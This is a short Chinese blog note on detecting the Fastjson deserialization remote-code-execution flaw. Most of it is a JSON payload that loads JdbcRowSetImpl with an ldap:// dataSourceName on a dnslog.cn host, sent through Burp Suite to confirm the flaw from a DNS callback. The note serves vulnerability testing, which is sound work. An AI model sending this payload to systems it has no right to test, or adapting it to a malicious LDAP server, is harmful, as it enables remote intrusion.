由于内容比较简单,我直接贴图,怕我自己忘了。

 

  测试Fastjson版本号:1.2.15

 

  直接发送用burpsuite发送payload,将dataSourceName改成dnslog获取到的域名。

 

  payload:

{

    "a":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

    "b":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"ldap://6v0jfv.dnslog.cn

",

        "autoCommit":true

    }

}

 

利用DNSLOG测试Fastjson远程命令执行漏洞

 

 

 

 

  若刷新DNSlog有记录增加,那说明漏洞存在,反之,则不存在。

 

 利用DNSLOG测试Fastjson远程命令执行漏洞

 

 

 

如有错误,请及时指正,谢谢!

 

相关文章:

  • 2021-08-25
  • 2021-07-11
  • 2021-09-01
  • 2021-11-07
  • 2021-12-21
  • 2021-12-04
猜你喜欢
  • 2021-07-15
  • 2021-12-29
  • 2022-12-23
  • 2021-07-23
  • 2021-04-19
  • 2021-07-21
相关资源
相似解决方案